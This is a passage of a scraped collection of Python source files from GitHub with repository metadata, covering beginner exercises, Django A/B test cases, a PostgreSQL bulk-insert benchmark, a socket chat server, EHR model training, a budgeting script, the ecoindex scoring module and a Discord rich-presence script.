creatable\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_17/all-possible-recipes-from-given-supplies.py","file_name":"all-possible-recipes-from-given-supplies.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34274776697","text":"import math\n\nhour_exam = int(input())\nminute_exam = int(input())\nhour_arrive = int(input())\nminute_arrive = int(input())\n\nall_minute_exam = hour_exam * 60 + minute_exam\nall_minute_arrive = hour_arrive * 60 + minute_arrive\n\nif all_minute_arrive <= all_minute_exam:\n if all_minute_exam - all_minute_arrive <= 30:\n diff = all_minute_exam - all_minute_arrive\n print(\"On time\")\n if diff != 0:\n print(f'{diff} minutes before the start')\n else:\n diff = all_minute_exam - all_minute_arrive\n diff_hour = math.floor(diff / 60)\n diff_min = math.floor(diff % 60)\n if diff_hour == 0:\n 
print(\"Early\")\n print(f'{diff} minutes before the start')\n elif 0 <= diff_min < 10:\n print(\"Early\")\n print(f'{diff_hour}:0{diff_min} hours before the start')\n else:\n print(\"Early\")\n print(f'{diff_hour}:{diff_min} hours before the start')\nelse:\n diff = all_minute_arrive - all_minute_exam\n diff_hour = math.floor(diff / 60)\n diff_min = math.floor(diff % 60)\n if diff_hour == 0:\n print(\"Late\")\n print(f'{diff} minutes after the start')\n else:\n if 0<=diff_min<10:\n print(\"Late\")\n print(f'{diff_hour}:0{diff_min} hours after the start')\n else:\n print(\"Late\")\n print(f'{diff_hour}:{diff_min} hours after the start')\n","repo_name":"Dochko0/Python","sub_path":"Python_Basics/05_Nested_Conditional_Statements_Exercise/07_On_Time_For_The_Exam.py","file_name":"07_On_Time_For_The_Exam.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73465844074","text":"from django.template.response import SimpleTemplateResponse\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\n\nfrom honest_ab.api import get_experiment_bin\nfrom honest_ab.binning_functions.base import CachedExperimentBinningHandlerBase, HONEST_AB_COOKIE_KEY, CachedExperimentDomainChooser\nfrom honest_ab.middleware import HonestABMiddleware\nfrom honest_ab.models import ExperimentDomain, Experiment, ExperimentDomainAllocation\n\n\nrf = RequestFactory()\n\n\nclass FakeObj(object):\n\n def __init__(self, pk=42):\n self.pk = pk\n\n\nclass FakeBinningFunction(CachedExperimentBinningHandlerBase):\n\n def _cookie_key(self, obj, experiment):\n return \"fake\"\n\n def _make_decision(self, obj, experiment):\n return \"1\"\n\n\nclass DomainChooserTestCases(TestCase):\n\n def setUp(self):\n super(DomainChooserTestCases, self).setUp()\n self.default_domain = ExperimentDomain.objects.get()\n\n def test_retrieve_cached_domain(self):\n obj = FakeObj(200)\n object_name = '.'.join([str(obj.__class__.__module__), str(obj.__class__.__name__)])\n ExperimentDomainAllocation.objects.create(\n experiment_domain=self.default_domain,\n model=object_name,\n model_pk=200\n )\n experiment = Experiment.objects.create(\n domain=self.default_domain,\n slug=\"testtest\"\n )\n self.assertTrue(CachedExperimentDomainChooser().check_domain(obj, experiment))\n self.assertEqual(1, ExperimentDomainAllocation.objects.count())\n\n def test_create_new_domain(self):\n # With no assigned domains, create one.\n experiment = Experiment.objects.create(\n domain=self.default_domain,\n slug=\"testtest\"\n )\n self.assertTrue(CachedExperimentDomainChooser().check_domain(FakeObj(100), experiment))\n domain_cache = ExperimentDomainAllocation.objects.get()\n self.assertEqual(domain_cache.model_pk, 100)\n self.assertEqual(domain_cache.experiment_domain, self.default_domain)\n\n def test_multiple_domains(self):\n # Add second domain (so there will be two)\n # Verify that some tests go to each.\n new_domain = ExperimentDomain.objects.create(\n name=\"second\",\n slug=\"second\"\n )\n experiment = Experiment.objects.create(\n domain=new_domain,\n slug=\"testtest\"\n )\n\n result_counter = {\n True: 0,\n False: 0\n }\n for i in range(100):\n result_counter[CachedExperimentDomainChooser().check_domain(FakeObj(i * 100), experiment)] += 1\n self.assertGreater(result_counter[True], 30)\n self.assertGreater(result_counter[False], 30)\n\n\nclass ApiTestCases(TestCase):\n\n def setUp(self):\n super(ApiTestCases, self).setUp()\n self.experiment_domain = 
ExperimentDomain.objects.create()\n bin_class_string = \".\".join([FakeBinningFunction.__module__, FakeBinningFunction.__name__])\n self.experiment = Experiment.objects.create(\n domain=self.experiment_domain,\n decision_class=bin_class_string,\n slug=\"testtest\"\n )\n\n def test_get_experiment_bin(self):\n group = get_experiment_bin(FakeObj(), self.experiment.slug)\n self.assertEqual(group['honest_ab_experiments']['testtest'], FakeBinningFunction()._make_decision(None, None))\n\n def test_no_binning_class_found(self):\n pass\n\n\nclass CookieTests(TestCase):\n urls = 'tests.urls'\n\n def setUp(self):\n super(CookieTests, self).setUp()\n self.experiment_domain = ExperimentDomain.objects.create()\n bin_class_string = \".\".join([FakeBinningFunction.__module__, FakeBinningFunction.__name__])\n self.experiment = Experiment.objects.create(\n domain=self.experiment_domain,\n decision_class=bin_class_string,\n slug=\"testtest\"\n )\n\n def test_sets_cookie_on_use(self):\n # Middleware should set a cookie.\n request = rf.get('test_view/testtest')\n context = {\n 'random': 'sample'\n }\n context = get_experiment_bin(FakeObj(), self.experiment.slug, request, context)\n middleware = HonestABMiddleware()\n response = SimpleTemplateResponse(template=\"\", context=context)\n response = middleware.process_response(request, response)\n\n for key, value in context[HONEST_AB_COOKIE_KEY]['__cache__'].iteritems():\n cookie_value = response.cookies.get(key)\n self.assertIsNotNone(cookie_value)\n","repo_name":"guyrt/honest_ab","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74553394151","text":"import time\nimport random\n\nimport psycopg2 as pg\nfrom psycopg2.extras import execute_values\n\n\ndef main() -> None:\n print(\"Start values generation\")\n\n # setup\n conn = pg.connect(\n host=\"127.0.0.1\",\n user=\"postgres\",\n password=\"postgres\",\n database=\"somedb\"\n )\n curr = conn.cursor()\n\n # main\n start = time.time()\n\n try:\n print(\"Generating values list ...\")\n values = []\n\n for i in range(10_000_000):\n val = random.randint(100, 1_000)\n values.append((i, val,))\n\n print(\"Executing in batch ... 
(several tens of seconds)\")\n execute_values(\n curr,\n \"INSERT INTO test_table_1 VALUES %s\",\n values,\n\n # Page size increased from 100\n # affects the bulk insert time from\n # 120 seconds to roughly 58 seconds (so about half)\n page_size=100_000 # NOTICE the large page size (default 100)\n )\n\n print(\"Committing ...\")\n conn.commit()\n\n stop = time.time()\n elapsed = stop - start\n\n except KeyboardInterrupt:\n print(\"\\nCtrl+C detected!\")\n elapsed = 0\n\n # cleanup\n curr.close()\n conn.close()\n print(f\"Values generation DONE ({elapsed:.2f}s)\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AndreiHondrari/techonologies-exploration","sub_path":"general-databases/general-sql/limits-testing/p01_02_many_rows_batch_insert_psycopg2/02_insert_many_rows.py","file_name":"02_insert_many_rows.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42945141834","text":"import select\nimport socket\nfrom server_values import *\ninitialize()\nfrom server_handler import *\nserver_keys = None\n\n\nBYTE_SIZE = 4000\n# Bind the socket to the port\ndef start_server():\n global server_keys\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socket_address = (\"127.0.0.1\", 7777)\n server.bind(socket_address)\n server.listen()\n server_keys = Encryption_handler.get_keys(1500)\n print(\"START_SERVER: LISTENING AT:\", socket_address)\n print(\"START_SERVER: server got keys!\", end=\"\\n\\n\")\n return server\n\n\ndef handle_close(s):\n global connected_users\n global authorize_connection\n global users_keys\n\n try:\n print(f\"HANDLE_CLOSE: closing {s.getpeername()} user: {connected_users[s]}\")\n except:\n print(f\"HANDLE_CLOSE: closing {s.getpeername()}\")\n try:\n authorize_connection.pop(connected_users[s])\n except KeyError:\n pass\n\n try:\n users_keys.pop(s)\n except KeyError:\n pass\n\n try:\n connected_users.pop(s)\n except KeyError:\n pass\n print(\"HANDLE_CLOSE: done closing!\")\n print(f\"\"\"HANDLE_CLOSE: dicts status:\n conncted_users: {connected_users}\n authorize_connection: {authorize_connection}\n users_keys: {users_keys}\n \"\"\", end=\"\\n\\n\")\n\n\ndef sendmsgs(msg, s=None):\n global users_keys\n\n if s is None:\n print(\"SENDMSGS: sending-\", \"|\".join(msg).encode())\n return \"|\".join(msg).encode()\n else:\n print(\"SENDMSGS: sending-\", Encryption_handler.encrypt(\"|\".join(msg), users_keys[s]), end=\"\\n\\n\")\n return Encryption_handler.encrypt(\"|\".join(msg), users_keys[s])\n\n\ndef start_listening(server):\n global known_users\n global connected_users\n global users_keys\n global authorize_connection\n\n inputs = [server]\n print(\"LISTEN: listening started\")\n while inputs:\n readable, writable, exceptional = select.select(inputs, [], [])\n for s in readable:\n if s is server:\n # New connection\n connection, client_address = s.accept()\n print(f'LISTEN: new connection from {client_address}', end=\"\\n\\n\")\n inputs.append(connection)\n\n else: # s.getpeername()\n data = s.recv(BYTE_SIZE)\n if data:\n if s not in users_keys.keys():\n print(f\"LISTEN: {s.getpeername()} sending NOT ENCR \\nmsg:{data.decode()}\", end=\"\\n\\n\")\n data = data.decode().split(\"|\")\n command, c_data = data[0], data[1:]\n if command == \"close\":\n print(f\"LISTEN: {s.getpeername()} asked to start closing\")\n inputs.remove(s)\n handle_close(s)\n s.close()\n else:\n if command == \"login\": # login|user|password\n print(f\"LISTEN: {s.getpeername()} begin to 
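# --- editor's aside (sketch, not part of the original record) ---
# On the bulk-insert note above: execute_values groups rows into
# multi-row VALUES statements, and page_size controls how many rows go
# into each statement, so larger pages mean fewer server round trips
# (the roughly 2x speedup mentioned in that script's comment).
# timed_bulk_insert is a hypothetical helper; the table name is the one
# the script itself uses.
import time
from psycopg2.extras import execute_values

def timed_bulk_insert(cur, rows, page_size):
    start = time.time()
    execute_values(cur, "INSERT INTO test_table_1 VALUES %s", rows,
                   page_size=page_size)
    return time.time() - start
# --- end aside ---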
login\")\n returned = login([s] + c_data)\n if returned[0] == \"ok\":\n print(f\"LISTEN: user {connected_users[s]} is now conncted, conn: {s.getpeername()}\")\n s.sendall(\"ok|None\".encode())\n else:\n print(f\"LISTEN: {s.getpeername()} connection failed, error msg: {returned}\")\n s.sendall(sendmsgs(returned))\n else:\n if s not in connected_users.keys():\n print(f\"LISTEN: {s.getpeername()} is unknown, the server blocks him\")\n s.sendall(\"error|unauthorized user, connection closed\".encode())\n inputs.remove(s)\n handle_close(s)\n s.close()\n\n else:\n if command == \"start_encrypt\": # start_encrypt|pb\n print(f\"LISTEN: {connected_users[s]} start to ENC\")\n s.sendall(sendmsgs([\"ok\"]))\n key = s.recv(BYTE_SIZE)\n start_encrypt(key, s)\n s.sendall(Encryption_handler.save_public(server_keys[\"pb\"]))\n print(f\"LISTEN: {connected_users[s]} done ENC!\\nhis pb:\\t{users_keys[s]}\")\n\n elif command == \"ok\":\n print(\"client response successfully\")\n s.sendall(\"ok|None\".encode())\n\n else: # data received is now encrypted\n if s not in connected_users.keys():\n print(\"ENC_LISTEN: unauthorized user found, the server closed connection\", s.getpeername())\n s.sendall(\"error|unauthorized user, connection closed\".encode())\n inputs.remove(s)\n handle_close(s)\n s.close()\n else:\n print(f\"ENC_LISTEN: got an ENC msg from {connected_users[s]}\")\n data = Encryption_handler.decrypt(data, server_keys[\"pr\"])\n print(\"the msg:\", data)\n data = data.split(\"|\")\n command, c_data = data[0], data[1:]\n if command == \"close\":\n inputs.remove(s)\n handle_close(s)\n s.close()\n\n elif command == \"authorize\": # authorize|want2chat\n data = authorize(connected_users[s], c_data)\n s.sendall(sendmsgs(data, s))\n\n elif command == \"sendto_msg\": # sendto_msg|sendto|data\n data = sendto_msg(s, c_data[0], c_data[1])\n s.sendall(sendmsgs(data, s))\n\n elif command == \"connected\":\n print(\"faf\")\n data = conncted(s)\n s.sendall(Encryption_handler.encrypt(data, users_keys[s]))\n else:\n # Interpret empty result as closed connection\n print(f'closing {client_address}, he died')\n # Stop listening for input on the connection\n inputs.remove(s)\n handle_close(s)\n s.close()\n\n\ndef main():\n server = start_server()\n start_listening(server)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"itamarUliel/cyberProj","sub_path":"proj_code/waste/projectServer.py","file_name":"projectServer.py","file_ext":"py","file_size_in_byte":7041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17171256447","text":"from pyhealth.datasets import MIMIC3Dataset, MIMIC4Dataset\nfrom graphcare_.task_fn import drug_recommendation_fn, drug_recommendation_mimic4_fn, mortality_prediction_mimic3_fn, readmission_prediction_mimic3_fn, length_of_stay_prediction_mimic3_fn, length_of_stay_prediction_mimic4_fn, mortality_prediction_mimic4_fn, readmission_prediction_mimic4_fn\nfrom pyhealth.datasets import get_dataloader\nfrom graphcare_ import split_by_patient\nimport pickle\nfrom pyhealth.trainer import Trainer\nimport torch\nfrom pyhealth.models import Transformer, RETAIN, SafeDrug, MICRON, CNN, RNN, GAMENet\nfrom collections import defaultdict\nimport json\n\ntasks = \\\n[\n \"mortality\", \n \"readmission\", \n \"lenofstay\", \n \"drugrec\"\n ]\ntrain_ratios = \\\n[\n 0.001,\n 0.002,\n 0.003,\n 0.004,\n 0.005,\n 0.006,\n 0.007,\n 0.008,\n 0.009,\n 0.01,\n 0.02,\n 0.03,\n 0.04,\n 0.05,\n 0.06,\n 0.07,\n 0.08,\n 0.09,\n 0.1,\n 0.3,\n 0.50,\n 0.7,\n 
0.9,\n]\n\ndevice = torch.device('cuda:4' if torch.cuda.is_available() else 'cpu')\n\nfor task in tasks:\n print(\"task: \", task)\n if task == \"mortality\" or task == \"readmission\":\n with open(f'/data/pj20/exp_data/ccscm_ccsproc_atc3/sample_dataset_mimic3_{task}_th015.pkl', 'rb') as f:\n sample_dataset = pickle.load(f)\n else:\n with open(f'/data/pj20/exp_data/ccscm_ccsproc/sample_dataset_mimic3_{task}_th015.pkl', 'rb') as f:\n sample_dataset = pickle.load(f)\n for train_ratio in train_ratios:\n\n if task != \"drugrec\":\n models = [RNN, Transformer, RETAIN]\n else:\n models = [\n Transformer, \n RETAIN, \n # SafeDrug, \n MICRON, \n # GAMENet\n ]\n\n\n results = defaultdict(list)\n\n for i in range(50):\n print(\"train_ratio: \", train_ratio)\n train_dataset, val_dataset, test_dataset = split_by_patient(sample_dataset, [0.8, 0.1, 0.1], train_ratio=train_ratio, seed=528)\n train_loader = get_dataloader(train_dataset, batch_size=64, shuffle=True)\n val_loader = get_dataloader(val_dataset, batch_size=64, shuffle=False)\n test_loader = get_dataloader(test_dataset, batch_size=64, shuffle=False)\n for model_ in models:\n if task == \"mortality\" or task == \"readmission\":\n model = model_(\n dataset=sample_dataset,\n feature_keys=[\"conditions\", \"procedures\", \"drugs\"],\n label_key=\"label\",\n mode=\"binary\",\n )\n ## binary\n trainer = Trainer(model=model, device=device, metrics=[\"pr_auc\", \"roc_auc\", \"accuracy\", \"f1\", \"jaccard\"])\n trainer.train(\n train_dataloader=train_loader,\n val_dataloader=val_loader,\n epochs=50,\n monitor=\"accuracy\",\n )\n\n elif task == \"lenofstay\":\n model = model_(\n dataset=sample_dataset,\n feature_keys=[\"conditions\", \"procedures\"],\n label_key=\"label\",\n mode=\"multiclass\",\n )\n\n ## multi-class\n trainer = Trainer(model=model, device=device, metrics=[\"roc_auc_weighted_ovr\", \"cohen_kappa\", \"accuracy\", \"f1_weighted\"])\n trainer.train(\n train_dataloader=train_loader,\n val_dataloader=val_loader,\n epochs=50,\n monitor=\"roc_auc_weighted_ovr\",\n )\n\n elif task == \"drugrec\":\n try:\n model = model_(\n dataset=sample_dataset,\n feature_keys=[\"conditions\", \"procedures\"],\n label_key=\"drugs\",\n mode=\"multilabel\",\n )\n except:\n model = model_(dataset=sample_dataset)\n\n ## multi-label\n trainer = Trainer(model=model, device=device, metrics=[\"pr_auc_samples\", \"roc_auc_samples\", \"f1_samples\", \"jaccard_samples\"])\n try:\n trainer.train(\n train_dataloader=train_loader,\n val_dataloader=val_loader,\n epochs=50,\n monitor=\"pr_auc_samples\",\n )\n\n except:\n try:\n results[model_.__name__].append(trainer.evaluate(val_loader))\n except:\n continue\n continue\n\n results[model_.__name__].append(trainer.evaluate(val_loader))\n\n\n avg_results = defaultdict(dict)\n\n for k, v in results.items():\n for k_, v_ in v[0].items():\n avg_results[k][k_] = sum([vv[k_] for vv in v]) / len(v)\n\n\n import numpy as np\n # calculate standard deviation\n variation_results = defaultdict(dict)\n\n for k, v in results.items():\n for k_, v_ in v[0].items():\n variation_results[k][k_] = np.std([vv[k_] for vv in v])\n\n\n print(avg_results)\n print(variation_results)\n with open(f\"./ehr_training_result/avg_results_{task}_{train_ratio}.json\", \"w\") as f:\n json.dump(avg_results, f, indent=6)\n with open(f\"./ehr_training_result/variation_results_{task}_{train_ratio}.json\", \"w\") as f:\n json.dump(variation_results, f, 
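# --- editor's aside (sketch, not part of the original record) ---
# The hand-rolled averaging in the training script above reduces a list
# of per-run metric dicts to means and standard deviations; the same
# reduction in isolation (runs is made-up sample data):
import numpy as np

runs = [{"acc": 0.80, "f1": 0.70}, {"acc": 0.84, "f1": 0.74}]
avg = {k: float(np.mean([r[k] for r in runs])) for k in runs[0]}
std = {k: float(np.std([r[k] for r in runs])) for k in runs[0]}
assert abs(avg["acc"] - 0.82) < 1e-12
# --- end aside ---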
indent=6)\n","repo_name":"pat-jj/GraphCare","sub_path":"baselines/ehr_models.py","file_name":"ehr_models.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"72"} +{"seq_id":"19223481749","text":"import csv \nimport pandas as pd\nimport matplotlib.pyplot as plt\ndef enter(): #做資料處理\n while True : \n n = eval(input(\"一次輸入幾筆資料 : \"))\n if n == 0 : break #停止紀錄\n else:\n month,day = input('日期(例:月/日) : ').split(\"/\")\n with open('output.csv', 'a', newline='') as csvfile : #開啟csv檔 \n for i in range(n):\n types , money = input('類型 : ') , eval(input('金額 : '))\n \n d['month'].append(month)\n d['day'].append(day)\n d['types'].append(types)\n d['money'].append(money) \n \n csv.writer(csvfile).writerow([month,day,types,money]) # \ndef pie_chart(): #畫圓餅圖\n df = pd.read_csv('output.csv')\n df_month = df.groupby(['month']) #把month分組 \n month , types , money = [] , [] , []\n \n for i in df['month'].unique(): \n df1 = df_month.get_group(i) #把month為i的擷取出來 \n month.append(i)\n \n for j in df1['types'].unique(): #month的唯一性\n types.append(j)\n \n for i in month:\n for j in set(types):\n df2 = df[(df['types']==j) & (df['month']==i)] #當資料的types等於j且month等於i \n money.append(df2.sum()['money'])\n \n data = list(money) \n explode = [0 for x in range(len(types))]\n labels = list(types)\n \n plt.figure(figsize=(7,7))\n plt.pie(data,explode,labels,autopct= \"%2.2f%%\")\n plt.title(\"%d Month\"%i)\n plt.savefig(\"%d Month\"%i,dpi=720,format=\"png\") \n plt.legend()\n \n #跑完圖表,把串列做清空\n month.clear()\n types.clear()\n money.clear() \ndef line_chart():\n df = pd.read_csv('output.csv')\n df_month_uni = df['month'].unique()#找出所有月份\n df_type_uni = df['types'].unique()#找出所有類型\n df_month_type_g = df.groupby(['month','types'])#用月份以及類型去找其他資料\n times = []#找出每個月分共有幾種不同的類型\n month_by_money = [] #找出折線圖的x軸座標(月)\n money_ = []#對應上面找出y軸\n type_ = []#對應上面兩個要比較的類型\n month = []#由上面3個程式統合出最終要畫的折線圖的x軸\n money = []#由上面3個程式統合出最終要畫的折線圖的y軸\n \n #做\n month_ = 0\n num = 0\n for i in df_month_uni:\n for j in df_type_uni:\n try:\n sum_ = df_month_type_g.get_group((i,j)).sum()['money']\n type_.append(j)\n money_.append(sum_)\n if i != month_ :\n times.append(num)\n num = 1\n month_ = i \n elif i == month_ : num +=1 \n except:continue\n times.append(num)\n \n for data in times :\n if data == 0 : times.remove(data)\n for c in range(len(times)) : \n for _ in range(times[c]) : month_by_money.append(df_month_uni[c])\n \n inp = input('要查帳的類型 : ')\n for number in range(len(type_)):\n if type_[number] == inp:\n month.append(month_by_money[number])\n money.append(money_[number])\n if len(month) < 1 or len(month) == 1:\n print('資料不足')\n elif len(month) ==0:\n print('查無此資料')\n \n else:\n plt.plot(month,money,\"r\",linewidth = 0.875,label=\"expenditure\",marker = '.') \n plt.xlabel(\"Month(s)\")\n plt.ylabel(\"Money\")\n plt.title(inp)\n \n plt.axis([1,12,0,max(money)+100])\n plt.xticks(range(1,13))\n \n plt.grid(b=True,axis='both')\n plt.legend(loc='best')\ntry:\n with open('output.csv' , 'r' , newline='' ) as csvfile : \n dcsv = csv.reader(csvfile)\n \n for i in dcsv:\n if i == ['month', 'day', 'types', 'money']:\n d = {'month':[],'day':[],'types':[],'money':[]} #用字典去做分類\n \n with open('output.csv','r', newline='') as csvfile:\n rows = csv.reader(csvfile)\n \n for row in rows:\n if row[0].isdigit():\n d['month'].append(row[0])\n d['day'].append(row[1])\n d['types'].append(row[2])\n d['money'].append(row[3])\n enter() \nexcept:\n with open('output.csv' , 'w' , newline='' ) as 
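# --- editor's aside (sketch, not part of the original record) ---
# The nested loops in pie_chart/line_chart above rebuild per-(month,
# type) spending totals by hand; a pandas groupby yields the same table
# directly (df here is made-up sample data):
import pandas as pd

df = pd.DataFrame({"month": [1, 1, 2],
                   "types": ["food", "food", "rent"],
                   "money": [10, 20, 500]})
totals = df.groupby(["month", "types"])["money"].sum()
assert totals[(1, "food")] == 30
# --- end aside ---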
csvfile : \n csv.writer(csvfile).writerow(['month', 'day', 'types', 'money']) \n try:\n d = {'month':[],'day':[],'types':[],'money':[]} \n with open('output.csv','r', newline='') as csvfile:\n rows = csv.reader(csvfile)\n for row in rows:\n if row[0].isdigit():\n d['month'].append(row[0])\n d['day'].append(row[1])\n d['types'].append(row[2])\n d['money'].append(row[3])\n enter()\n except:\n d = {'month':[],'day':[],'types':[],'money':[]} \n enter()\nline_chart()\npie_chart()\n","repo_name":"Fang-YuXin/Python","sub_path":"完成.py","file_name":"完成.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34755444820","text":"from logging import Handler, NOTSET, LogRecord\nfrom contextvars import ContextVar\nfrom contextlib import contextmanager\nfrom typing import Optional, List, Callable\n\nlog_listeners: ContextVar[Optional[List[Callable[[str], None]]]] = ContextVar(\n 'log_listeners', default=None\n)\n\n\nclass ContextLogHandler(Handler):\n def __init__(self, level=NOTSET):\n Handler.__init__(self, level)\n\n def emit(self, record: LogRecord):\n listeners = log_listeners.get()\n if listeners:\n try:\n message = self.format(record)\n for listener in listeners:\n listener(message)\n except Exception:\n self.handleError(record)\n\n\n@contextmanager\ndef capture_logs():\n listeners = log_listeners.get()\n if not listeners:\n listeners = []\n log_listeners.set(listeners)\n\n captured_logs = []\n listeners.append(captured_logs.append)\n\n try:\n yield captured_logs\n finally:\n listeners.remove(captured_logs.append)\n","repo_name":"metaspace2020/metaspace","sub_path":"metaspace/engine/sm/engine/utils/log_capture.py","file_name":"log_capture.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"72"} +{"seq_id":"28943325820","text":"from typing import List\n\nfrom ecoindex.data.grades import A, B, C, D, E, F, G\nfrom ecoindex.data.quantiles import quantiles_dom, quantiles_req, quantiles_size\nfrom ecoindex.models import Ecoindex\n\n\nasync def get_quantile(quantiles: List[int | float], value: int | float) -> float:\n for i in range(1, len(quantiles)):\n if value < quantiles[i]:\n return (\n i - 1 + (value - quantiles[i - 1]) / (quantiles[i] - quantiles[i - 1])\n )\n\n return len(quantiles) - 1\n\n\nasync def get_score(dom: int, size: float, requests: int) -> float:\n q_dom = await get_quantile(quantiles_dom, dom)\n q_size = await get_quantile(quantiles_size, size)\n q_req = await get_quantile(quantiles_req, requests)\n\n return round(100 - 5 * (3 * q_dom + 2 * q_req + q_size) / 6)\n\n\nasync def get_ecoindex(dom: int, size: float, requests: int) -> Ecoindex:\n score = await get_score(dom=dom, size=size, requests=requests)\n\n return Ecoindex(\n score=score,\n grade=await get_grade(score),\n ges=await get_greenhouse_gases_emmission(score),\n water=await get_water_consumption(score),\n )\n\n\nasync def get_grade(ecoindex: float) -> str:\n for grade in \"ABCDEF\":\n if ecoindex > globals()[grade]:\n return grade\n\n return \"G\"\n\n\nasync def get_greenhouse_gases_emmission(ecoindex: float) -> float:\n return round(100 * (2 + 2 * (50 - ecoindex) / 100)) / 100\n\n\nasync def get_water_consumption(ecoindex: float) -> float:\n return round(100 * (3 + 3 * (50 - ecoindex) / 100)) / 
100\n","repo_name":"cnumr/ecoindex_python","sub_path":"ecoindex/ecoindex.py","file_name":"ecoindex.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"70382588712","text":"#!/usr/bin/env python\n\nimport os\nimport time\nimport argparse\nimport pypresence\n\n\nfrom urllib.parse import unquote, quote\nfrom argparse import Namespace, ArgumentParser\n\nID = \"783900573388111922\"\nDELAY = 1.5\n\n\nENABLE_PROJECT_GITHUB_BUTTON = False\nIMAGE = \"3dhp_black\"\n\n\nrpc = None\npast_buf = None\ncurr_buf = None\n\n\nclass UserOptions:\n\t@staticmethod\n\tdef get_args() -> Namespace:\n\t\t\"\"\"Function with all the argument configuration using the ``argparser``\n\t\tlibrary that return the arguments given by the user in a ease to use\n\t\t``Namespace`` object.\n\t\t\"\"\"\n\t\tparser: ArgumentParser = ArgumentParser(description='Simple Script to show playing music on Discord')\n\n\t\tparser.add_argument('--enable-github-button', '-b', action=argparse.BooleanOptionalAction, default=False, help=\"Shows Aprich Project button linked to github\")\n\n\t\tparser.add_argument('--image', '-i', type=str, default=\"3dhp_black\", help=\"Default rich presence image.\")\n\t\n\t\treturn parser.parse_args()\n\n\nclass Display:\n\t@staticmethod\n\tdef log(msg):\n\t\tprint(f\"\\033[32mstatus ok:\\033[m {msg}\")\n\n\t@staticmethod\n\tdef err(msg, err=\"error\"):\n\t\tprint(f\"\\033[31m{err}:\\033[m {msg}\")\n\n\t@staticmethod\n\tdef status(ss, sn, sa):\n\t\tprint(f\"\\033[34m\\tstatus:\\033[33m\\t{ss}\\033[m\")\n\t\tprint(f\"\\033[34m\\tname:\\033[33m\\t{sn}\\033[m\")\n\t\tprint(f\"\\033[34m\\tartist:\\033[33m\\t{sa}\\033[m\")\n\n\nclass Discord:\n\t@staticmethod\n\tdef connect(err_h=lambda err: None):\n\t\ttry:\n\t\t\trpc.connect()\n\t\texcept Exception as err:\n\t\t\treturn err_h(type(err))\n\t\telse:\n\t\t\tDisplay.log(\"connected with discord app\")\n\n\t@staticmethod\n\tdef update(state, details, large_image, large_text, small_text, buttons=[],\n\t\t\t err_h=lambda err: None):\n\t\ttry:\n\t\t\trpc.update(state=state, details=details, large_image=large_image,\n\t\t\t\t\t large_text=large_text, small_text=small_text,\n\t\t\t\t\t buttons=buttons)\n\t\texcept Exception as err:\n\t\t\treturn err_h(type(err))\n\t\telse:\n\t\t\tDisplay.log(\"status updated\")\n\n\nclass ErrHandler:\n\t@staticmethod\n\tdef couldNotUpdate(err):\n\t\tDisplay.err(\"could not update the song status\", err)\n\t\tDiscord.connect(ErrHandler.couldNotConnect)\n\t\treturn True\n\n\t@staticmethod\n\tdef couldNotConnect(err):\n\t\tDisplay.err(\"discord not found\", err)\n\t\treturn True\n\n\ndef searchOnYoutube(songname, songartist) -> str:\n\tysu = \"https://youtube.com/search?q={query}\"\n\tquery = quote(str(songartist)+ \" - \" +str(songname))\n\treturn str(ysu.format(query=query))\n\n\n\n\nclass Controllers:\n\t@staticmethod\n\tdef getSong():\n\t\tisplaying: str = \"Stopped\"\n\t\tsongName: str = None\n\t\tsongArtist: str = None\n\t\tsongYtsearch: str = None\n\n\t\tgetplaying = os.popen(\"playerctl status\").read()\n\n\t\traw_meta = os.popen(\"playerctl metadata\").read()\n\t\tlinesplit = raw_meta.splitlines()\n\n\t\tif \"Playing\" in getplaying:\n\t\t\tisplaying = \"Playing\"\n\t\t\tfor x in linesplit:\n\t\t\t\tif \":artist\" in x:\n\t\t\t\t\tartist = x.split(\":artist\")\n\t\t\t\t\tsongArtist = artist[1].replace(\" \"*14, \"\") + \" \"*2\n\n\n\t\t\tfor y in linesplit:\n\t\t\t\tif \":title\" in y:\n\t\t\t\t\ttitle = 
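# --- editor's aside (sketch, not part of the original record) ---
# get_quantile in the ecoindex module above returns a fractional bucket
# index: for a value between quantiles[i-1] and quantiles[i] it yields
# (i-1) plus the linear fraction of the way into that bucket. The same
# logic restated synchronously, with a numeric check:
def quantile_index(quantiles, value):
    for i in range(1, len(quantiles)):
        if value < quantiles[i]:
            return i - 1 + (value - quantiles[i - 1]) / (quantiles[i] - quantiles[i - 1])
    return len(quantiles) - 1

assert quantile_index([0, 10, 20], 15) == 1.5
# --- end aside ---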
